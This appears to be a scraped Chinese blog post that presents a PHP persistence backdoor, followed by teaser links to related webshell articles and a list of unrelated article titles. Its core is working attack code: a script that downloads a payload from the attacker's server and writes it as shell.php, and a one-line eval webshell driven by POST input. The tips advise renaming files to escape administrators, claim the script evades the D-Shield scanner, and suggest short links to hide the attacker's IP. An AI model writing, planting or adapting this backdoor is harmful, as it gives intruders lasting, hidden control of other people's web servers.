<?php
function adminer($url, $isi) {$fp = fopen($isi, "w");$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_FILE, $fp);return curl_exec($ch);curl_close($ch);fclose($fp);ob_flush();flush();
}
if(adminer("http://xx.xx.xx.xx/config.txt","shell.php")) {echo "success, access shell.php";
} else {echo "fail";
}
?>

Tips1：xx.xx.xx.xx是你的VPS服务器，config.txt要放在你的服务器上，并且能访问。config.txt的内容为一句话，如下：

<?php eval(@$_POST['cmd']);?>

接着访问backdoor.php文件即可在目标服务器上生成一句话后门

Tips2：在实战中记得把文件名修改一下，否则很容易被管理员发现。
这种权限维持的方法相对于直接留下一句话文件要更加稳定，即使管理员将一句话后门文件删除了，只要backdoor.php文件还在，就可以一直生成后门文件。而且D盾还检测不出backdoor.php文件。如果手上没有免杀PHP后门的朋友们，不妨可以退而求其次，尝试一下。

Tips3：backdoor.php文件中会出现你的VPS服务器IP地址，这在一定程度上会有被反制的风险。那我们可以将URL转换成短链接进行隐匿。
短链接在线转换网址：ReURL - 传送门

短链接还原网址：https://www.donglishuzhai.net/tools/hy.php

经过测试，ReURL生成的短链接，上面的还原网站也还原不出来。

简单又较隐蔽的PHP后门相关推荐

1. php后门工具_教你识别简单的免查杀PHP后门

   一个最常见的一句话后门可能写作这样 或这样 tudouya 同学在FREEBUF上给出[一种构造技巧]利用 构造生成,当然,嫌太直观可以写作这样 然后再填充些普通代码进行伪装,一个简单的"免 ...

2. 寻找绝对隐蔽的后门的办法 分享

   nginx前几天nginx和IIS7都爆解析漏洞,搞了几个shell都 丢了,于是想寻找一个超级隐蔽的后门方法.无意中发现include这个函数可以把任意文件解析为php执行.网上去 搜索includ ...

3. 一些变态的PHP一句话后门收集

   这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的.今天我们细数一些有意思的PHP一句话木马. 利用404页面隐藏PHP小马 ...

4. 暗组免杀php,那些强悍的PHP一句话后门

   以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦. 这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法 ...

5. 使用语义触发器发起不可见后门攻击

   文章目录 Hidden Killer: Invisible Textual Backdoor Attacks with Syntactic Trigger 后门应用背景 基于词法的触发器 形式化文本后 ...

6. 追踪tcp得到php一句话菜刀连接即可,强大的PHP一句话后门

   强悍的PHP一句话后门 这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的. 今天我们细数一些有意思的PHP一句话木马. 1. ...

7. php 木马 加密,PHP后门木马详解

   说起php后门木马我就心有愉季啊前不久一个站就因不小心给人注入了然后写入了小木马这样结果大家知道的我就不说了下面我来给大家收集了各种php后门木马做法大家可参考. php后门木马对大家来说一点都不陌生 ...

8. 那些强悍的PHP一句话后门

   我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦. 强悍的PHP一句话后门 这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新 ...

9. php后门绕过eval关键字,一些变态的PHP一句话后门收集

   这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的.今天我们细数一些有意思的PHP一句话木马. 利用404页面隐藏PHP小马 ...

最新文章

1. 工作流编程循序渐进（9：使用本地服务在宿主和工作流之间通信）
2. 2、求100以内的素数之和。（20分）
3. CentOs上搭建git服务器
4. @Autowired自动装配对象和new对象的区别
5. 查找xml文件中某接点的值
6. Spark官方调优文档翻译（转载）
7. linux e514写入错误,Linux上使用vim编辑文件保存时报错：E514: write error (file system full?)...
8. 问题 G: 区间权值
9. ccsa安学网小程序_【大检修】“CCSA安学网”掀起指尖上的学习热潮，助力1#大检修...
10. linux shell脚本编程笔记（三）： 三种引号的区别
11. AAAI2021联邦学习论文集
12. matlab插图放大模糊,PPT中怎样简单处理放大后失真的图片
13. java华容道代码_Java 华容道完整源码
14. SQLite.Interop.dll 没有拷贝到输出目录
15. CTPN CRNN-Pytorch 银行卡号识别
16. Celery Django 运行 task 任务的时候 提示NotRegistered
17. Nmap 扩展（一）
18. 新浪云php与微信,新浪SAE php能够获取微信的头像，但是在本地运行代码获取不到？...
19. ABAP:BAPI_INCOMINGINVOICE_PARK 通过PO采购单创建预制发票MIRO
20. 发布DCWriter电子病历文本编辑器

热门文章

1. 李宏毅机器学习 之 回归Regression（二）
2. Python-定时爬取指定城市天气(一)-发送给关心的微信好友
3. java 头像 微信群_Android仿微信群聊头像
4. 【企业邮箱注册】管理员如何设置定期修改密码？
5. 从磁盘到B树到B+树
6. 更换VScode背景图，设置VScode背景为你喜欢的图片
7. c语言程序画正八边形,用少儿编程绘制一个正九边形
8. lol服务器修复失败,LOL客户端BUG遍地，服务器瘫痪长达一天！官方修复后毫无补偿引不满...
9. Matlab Excel服务器，笔记
10. Win7安装typhon使用心得